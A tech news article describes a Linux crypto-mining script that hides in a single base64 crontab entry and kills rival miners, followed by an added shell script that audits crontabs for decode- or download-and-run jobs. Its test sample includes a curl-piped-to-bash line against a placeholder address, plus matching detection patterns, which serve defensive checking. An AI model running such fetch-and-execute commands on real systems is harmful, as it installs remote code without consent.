New Crypto-Mining Malware Cleans the Linux Host to Maximize its Benefits

  • A new malicious cryptocurrency mining script hides in crontabs to plague Linux systems.
  • The new script detects and deletes many of the known Linux miners, essentially cleaning the host for itself.
  • Its code is based on KORKERDS, but it adds subtle yet crucial improvements over it.

Trend Micro researchers have discovered a new crypto-mining malware that deletes a large number of known Linux coin miners so that the host's system resources are all available to itself. The script reuses code from KORKERDS and Xbash, combining their obfuscation and persistence traits. This new malware uses crontab entries to download and execute more malicious code. Cron is a time-based task scheduler for Linux, so the script runs periodically and survives system reboots, re-downloading the malware code in case it has been detected and deleted.

Compared to the KORKERDS code that serves as its basis, the new malware does not uninstall any security products found on the infected system, nor does it install a rootkit. Instead, those KORKERDS components are included in its kill list, so if the original KORKERDS is already present on the system, it gets stopped. The cryptocurrency miner downloaded by the script is a custom version of XMR-Stak, one that supports a wide range of CPUs and GPUs, so the mining results are optimal. This new malware script not only kills all other coin miners and malware, but it also spots connections and services tied to specific IP addresses and suspends those as well.

The script inserts a single crontab entry that fetches and executes BASE64-encoded code. KORKERDS, by contrast, uses crontab more extensively and openly, so the new script achieves a higher level of concealment in its operation, while its propagation still relies on the KORKERDS Python script. Although subtle, the differences between KORKERDS and the new script are key to the efficiency and effectiveness of its operational routine. Removing all competing miners and malware, or at least stopping them, may make this script look like the lesser evil, but that doesn't mean the infected system will run any faster under its rule.

The best practice against this type of infection remains a multi-layered security setup, so that when a malicious script finds its way into a farm, it can be isolated and contained to a group of systems at worst. Regularly checking crontab entries and monitoring the tasks that eat up system resources is another solid way to detect possible malware infections. For a full list of the indicators of compromise for this new crypto-mining malware, check the detailed Trend Micro security report.
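As an added example (not code from the article or from Trend Micro), here is a small POSIX shell audit that implements the advice above to check crontab entries: it flags scheduled jobs that pipe base64-decoded or freshly downloaded content straight into a shell, the persistence pattern the article describes. The regular expression, the file locations and the sample crontab are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the article or the Trend Micro report: audit cron
# jobs for a scheduled entry that base64-decodes or downloads a payload and
# pipes it straight into a shell. Regex, paths and samples are assumptions.

# base64 -d / --decode, or curl/wget output, piped into sh or bash.
SUSPICIOUS_RE='base64[[:space:]]+(-d|--decode)[^|]*\|[[:space:]]*(ba)?sh|(curl|wget)[^|]*\|[[:space:]]*(ba)?sh'

# Print matching, non-comment lines of one crontab file, prefixed with
# its name. Always returns 0 so it composes cleanly under set -e.
scan_crontab_file() {
    grep -v '^[[:space:]]*#' "$1" 2>/dev/null \
        | grep -E -i "$SUSPICIOUS_RE" \
        | sed "s|^|$1: |"
    return 0
}

# Print the number of suspicious entries in one crontab file.
count_suspicious() {
    scan_crontab_file "$1" | wc -l | tr -d ' '
}

# Walk the usual system and per-user crontab locations on this host.
scan_all_crontabs() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/* /var/spool/cron/crontabs/*; do
        [ -f "$f" ] && scan_crontab_file "$f"
    done
    return 0
}

# Constructed sample crontab so the checker can be exercised offline.
# "ZWNobyBoaQ==" is base64 for "echo hi"; 198.51.100.10 is a documentation
# address. The last entry decodes a file but never executes it, so it must
# not be flagged.
write_sample_crontab() {
    cat > "$1" <<'EOF'
# m h dom mon dow user command
0 3 * * * root /usr/bin/certbot renew --quiet
*/5 * * * * root echo ZWNobyBoaQ== | base64 -d | sh
@reboot root curl -fsSL http://198.51.100.10/x.sh | bash
30 1 * * 0 root /usr/bin/base64 --decode /var/backups/key.b64 > /tmp/key
EOF
}

# Run with --demo to scan the constructed sample; otherwise audit this host.
case "${1:-}" in
    --demo) t=$(mktemp); write_sample_crontab "$t"; scan_crontab_file "$t"; rm -f "$t" ;;
    *) scan_all_crontabs ;;
esac
```

Pair the crontab audit with a look at the top CPU consumers (for example `ps -eo pid,pcpu,comm --sort=-pcpu | head` on GNU ps), since a miner that survives via cron will show up there even when its crontab entry is obfuscated.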

Have you ever been infected by crypto-mining malware? Let us know of your experience in the comments section below, and don’t forget to like and subscribe on our socials on Facebook and Twitter, your portal to daily tech news.
